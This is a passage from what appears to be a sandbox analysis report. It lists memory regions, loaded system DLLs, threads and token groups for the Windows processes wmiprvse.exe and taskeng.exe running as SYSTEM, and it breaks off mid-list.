0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6417 start_va = 0xf110830000 end_va = 0xf11092ffff entry_point = 0x0 region_type = private name = "private_0x000000f110830000" filename = "" Region: id = 6418 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6419 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6420 start_va = 0xf1106e0000 end_va = 0xf1106effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f1106e0000" filename = "" Region: id = 6421 start_va = 0xf1106f0000 end_va = 0xf1106f6fff entry_point = 0x0 region_type = private name = "private_0x000000f1106f0000" filename = "" Region: id = 6422 start_va = 0xf1107d0000 end_va = 0xf1107d6fff entry_point = 0x0 region_type = private name = "private_0x000000f1107d0000" filename = "" Region: id = 6423 start_va = 0xf110930000 end_va = 0xf1109edfff entry_point = 0xf110930000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6424 start_va = 0xf1109f0000 end_va = 0xf110a6ffff entry_point = 0x0 region_type = private name = "private_0x000000f1109f0000" filename = "" Region: id = 6425 start_va = 0xf110b30000 end_va = 0xf110b3ffff entry_point = 0x0 region_type = private name = "private_0x000000f110b30000" filename = "" Region: id = 6426 start_va = 0x7ff6a8ef0000 end_va = 0x7ff6a8feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a8ef0000" filename = "" Region: id = 6427 start_va = 0x7ff6a901b000 end_va = 0x7ff6a901cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6a901b000" filename = "" Region: id = 6428 start_va = 0x7ffc4d910000 end_va = 0x7ffc4d98efff entry_point = 0x7ffc4d910000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 6429 start_va = 0x7ffc50610000 end_va = 0x7ffc50634fff entry_point = 0x7ffc50610000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 6430 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6431 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6432 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6433 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6434 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6435 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6436 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6437 start_va = 0xf1107e0000 end_va = 0xf1107e0fff entry_point = 0x0 region_type = private name = "private_0x000000f1107e0000" filename = "" Region: id = 6438 start_va = 0xf1107f0000 end_va = 0xf1107f0fff entry_point = 0x0 region_type = private name = "private_0x000000f1107f0000" filename = "" Region: id = 6439 start_va = 0xf110a70000 end_va = 0xf110aeffff entry_point = 0x0 region_type = private name = "private_0x000000f110a70000" filename = "" Region: id = 6440 start_va = 0xf110b40000 end_va = 0xf110cc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110b40000" filename = "" Region: id = 6441 start_va = 0xf110cd0000 end_va = 0xf110e50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110cd0000" filename = "" Region: id = 6442 start_va = 0xf110e60000 end_va = 0xf110f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110e60000" filename = "" Region: id = 6443 start_va = 0x7ff6a9019000 end_va = 0x7ff6a901afff entry_point = 0x0 region_type = private name = "private_0x00007ff6a9019000" filename = "" Region: id = 6444 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6445 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6446 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6447 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6448 start_va = 0xf110800000 end_va = 0xf110800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110800000" filename = "" Region: id = 6449 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6450 start_va = 0xf110810000 end_va = 0xf110810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f110810000" filename = "" Region: id = 6451 start_va = 0x7ffc4a370000 end_va = 0x7ffc4a380fff entry_point = 0x7ffc4a370000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 6452 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6453 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6454 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6455 start_va = 0xf110f20000 end_va = 0xf111256fff entry_point = 0xf110f20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6456 start_va = 0xf111260000 end_va = 0xf1112dffff entry_point = 0x0 region_type = private name = "private_0x000000f111260000" filename = "" Region: id = 6457 start_va = 0xf1112e0000 end_va = 0xf11135ffff entry_point = 0x0 region_type = private name = "private_0x000000f1112e0000" filename = "" Region: id = 6458 start_va = 0xf111360000 end_va = 0xf1113dffff entry_point = 0x0 region_type = private name = "private_0x000000f111360000" filename = "" Region: id = 6459 start_va = 0x7ff6a9013000 end_va = 0x7ff6a9014fff entry_point = 0x0 region_type = private name = "private_0x00007ff6a9013000" filename = "" Region: id = 6460 start_va = 0x7ff6a9015000 end_va = 0x7ff6a9016fff entry_point = 0x0 region_type = private name = "private_0x00007ff6a9015000" filename = "" Region: id = 6461 start_va = 0x7ff6a9017000 end_va = 0x7ff6a9018fff entry_point = 0x0 region_type = private name = "private_0x00007ff6a9017000" filename = "" Region: id = 6462 start_va = 0x7ffc496f0000 end_va = 0x7ffc49703fff entry_point = 0x7ffc496f0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 6463 start_va = 0x7ffc49710000 end_va = 0x7ffc49807fff entry_point = 0x7ffc49710000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 6464 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6465 start_va = 0x7ffc57a20000 end_va = 0x7ffc57a27fff entry_point = 0x7ffc57a20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Thread: id = 102 os_tid = 0xdb4 Thread: id = 103 os_tid = 0xdbc Thread: id = 104 os_tid = 0xdb8 Thread: id = 105 os_tid = 0xdac Thread: id = 106 os_tid = 0xdc0 Thread: id = 107 os_tid = 0xdcc Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x41695000" os_pid = "0xda0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 6466 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6467 start_va = 0x84ddf10000 end_va = 0x84ddf2ffff entry_point = 0x0 region_type = private name = "private_0x00000084ddf10000" filename = "" Region: id = 6468 start_va = 0x84ddf30000 end_va = 0x84ddf43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084ddf30000" filename = "" Region: id = 6469 start_va = 0x84ddf50000 end_va = 0x84ddfcffff entry_point = 0x0 region_type = private name = "private_0x00000084ddf50000" filename = "" Region: id = 6470 start_va = 0x84ddfd0000 end_va = 0x84ddfd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084ddfd0000" filename = "" Region: id = 6471 start_va = 0x84ddfe0000 end_va = 0x84ddfe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084ddfe0000" filename = "" Region: id = 6472 start_va = 0x84ddff0000 end_va = 0x84ddff1fff entry_point = 0x0 region_type = private name = "private_0x00000084ddff0000" filename = "" Region: id = 6473 start_va = 0x7df5ff6c0000 end_va = 0x7ff5ff6bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6c0000" filename = "" Region: id = 6474 start_va = 0x7ff71c4f0000 end_va = 0x7ff71c512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71c4f0000" filename = "" Region: id = 6475 start_va = 0x7ff71c51d000 end_va = 0x7ff71c51efff entry_point = 0x0 region_type = private name = "private_0x00007ff71c51d000" filename = "" Region: id = 6476 start_va = 0x7ff71c51f000 end_va = 0x7ff71c51ffff entry_point = 0x0 region_type = private name = "private_0x00007ff71c51f000" filename = "" Region: id = 6477 start_va = 0x7ff71d470000 end_va = 0x7ff71d4eefff entry_point = 0x7ff71d470000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 6478 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6479 start_va = 0x84de020000 end_va = 0x84de11ffff entry_point = 0x0 region_type = private name = "private_0x00000084de020000" filename = "" Region: id = 6480 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6481 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6482 start_va = 0x84ddf10000 end_va = 0x84ddf1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084ddf10000" filename = "" Region: id = 6483 start_va = 0x84ddf20000 end_va = 0x84ddf26fff entry_point = 0x0 region_type = private name = "private_0x00000084ddf20000" filename = "" Region: id = 6484 start_va = 0x84de000000 end_va = 0x84de006fff entry_point = 0x0 region_type = private name = "private_0x00000084de000000" filename = "" Region: id = 6485 start_va = 0x84de120000 end_va = 0x84de1ddfff entry_point = 0x84de120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6486 start_va = 0x84de1e0000 end_va = 0x84de25ffff entry_point = 0x0 region_type = private name = "private_0x00000084de1e0000" filename = "" Region: id = 6487 start_va = 0x84de290000 end_va = 0x84de29ffff entry_point = 0x0 region_type = private name = "private_0x00000084de290000" filename = "" Region: id = 6488 start_va = 0x7ff71c3f0000 end_va = 0x7ff71c4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71c3f0000" filename = "" Region: id = 6489 start_va = 0x7ff71c51b000 end_va = 0x7ff71c51cfff entry_point = 0x0 region_type = private name = "private_0x00007ff71c51b000" filename = "" Region: id = 6490 start_va = 0x7ffc49550000 end_va = 0x7ffc49565fff entry_point = 0x7ffc49550000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 6491 start_va = 0x7ffc49710000 end_va = 0x7ffc49807fff entry_point = 0x7ffc49710000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 6492 start_va = 0x7ffc4d910000 end_va = 0x7ffc4d98efff entry_point = 0x7ffc4d910000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 6493 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6494 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6495 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6496 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6497 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6498 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6499 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6500 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6501 start_va = 0x84de010000 end_va = 0x84de010fff entry_point = 0x0 region_type = private name = "private_0x00000084de010000" filename = "" Region: id = 6502 start_va = 0x84de260000 end_va = 0x84de260fff entry_point = 0x0 region_type = private name = "private_0x00000084de260000" filename = "" Region: id = 6503 start_va = 0x84de270000 end_va = 0x84de274fff entry_point = 0x84de270000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6504 start_va = 0x84de280000 end_va = 0x84de280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084de280000" filename = "" Region: id = 6505 start_va = 0x84de2a0000 end_va = 0x84de5d6fff entry_point = 0x84de2a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6506 start_va = 0x84de5e0000 end_va = 0x84de767fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084de5e0000" filename = "" Region: id = 6507 start_va = 0x84de770000 end_va = 0x84de8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084de770000" filename = "" Region: id = 6508 start_va = 0x84de900000 end_va = 0x84de9bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084de900000" filename = "" Region: id = 6509 start_va = 0x84de9c0000 end_va = 0x84dea3ffff entry_point = 0x0 region_type = private name = "private_0x00000084de9c0000" filename = "" Region: id = 6510 start_va = 0x84dea40000 end_va = 0x84deb3ffff entry_point = 0x0 region_type = private name = "private_0x00000084dea40000" filename = "" Region: id = 6511 start_va = 0x84deb40000 end_va = 0x84deb40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084deb40000" filename = "" Region: id = 6512 start_va = 0x84deb50000 end_va = 0x84deb50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084deb50000" filename = "" Region: id = 6513 start_va = 0x84deb60000 end_va = 0x84debdffff entry_point = 0x0 region_type = private name = "private_0x00000084deb60000" filename = "" Region: id = 6514 start_va = 0x84debe0000 end_va = 0x84dec5ffff entry_point = 0x0 region_type = private name = "private_0x00000084debe0000" filename = "" Region: id = 6515 start_va = 0x84dec60000 end_va = 0x84decdffff entry_point = 0x0 region_type = private name = "private_0x00000084dec60000" filename = "" Region: id = 6516 start_va = 0x84dece0000 end_va = 0x84ded5ffff entry_point = 0x0 region_type = private name = "private_0x00000084dece0000" filename = "" Region: id = 6517 start_va = 0x84ded60000 end_va = 0x84deddffff entry_point = 0x0 region_type = private name = "private_0x00000084ded60000" filename = "" Region: id = 6518 start_va = 0x84dede0000 end_va = 0x84dee5ffff entry_point = 0x0 region_type = private name = "private_0x00000084dede0000" filename = "" Region: id = 6519 start_va = 0x7ff71c3ea000 end_va = 0x7ff71c3ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff71c3ea000" filename = "" Region: id = 6520 start_va = 0x7ff71c3ec000 end_va = 0x7ff71c3edfff entry_point = 0x0 region_type = private name = "private_0x00007ff71c3ec000" filename = "" Region: id = 6521 start_va = 0x7ff71c3ee000 end_va = 0x7ff71c3effff entry_point = 0x0 region_type = private name = "private_0x00007ff71c3ee000" filename = "" Region: id = 6522 start_va = 0x7ff71c513000 end_va = 0x7ff71c514fff entry_point = 0x0 region_type = private name = "private_0x00007ff71c513000" filename = "" Region: id = 6523 start_va = 0x7ff71c515000 end_va = 0x7ff71c516fff entry_point = 0x0 region_type = private name = "private_0x00007ff71c515000" filename = "" Region: id = 6524 start_va = 0x7ff71c517000 end_va = 0x7ff71c518fff entry_point = 0x0 region_type = private name = "private_0x00007ff71c517000" filename = "" Region: id = 6525 start_va = 0x7ff71c519000 end_va = 0x7ff71c51afff entry_point = 0x0 region_type = private name = "private_0x00007ff71c519000" filename = "" Region: id = 6526 start_va = 0x7ffc496c0000 end_va = 0x7ffc496e4fff entry_point = 0x7ffc496c0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 6527 start_va = 0x7ffc496f0000 end_va = 0x7ffc49703fff entry_point = 0x7ffc496f0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 6528 start_va = 0x7ffc4a370000 end_va = 0x7ffc4a380fff entry_point = 0x7ffc4a370000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 6529 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6530 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6531 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6532 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6533 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6534 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6535 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6536 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6537 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6538 start_va = 0x7ffc505d0000 end_va = 0x7ffc5060cfff entry_point = 0x7ffc505d0000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 6539 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 6540 start_va = 0x7ffc51570000 end_va = 0x7ffc51580fff entry_point = 0x7ffc51570000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Thread: id = 111 os_tid = 0xdfc Thread: id = 112 os_tid = 0xe00 Thread: id = 113 os_tid = 0xe54 Thread: id = 114 os_tid = 0xd8c Thread: id = 115 os_tid = 0xa70 Thread: id = 116 os_tid = 0xcec Thread: id = 117 os_tid = 0xd64 Thread: id = 118 os_tid = 0xcf4 Thread: id = 119 os_tid = 0xd90 Process: id = "8" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x6ee3e000" os_pid = "0x6d0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x324" cmd_line = "taskeng.exe {9A477A6B-8579-4244-9117-5214B7A5EFED} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT 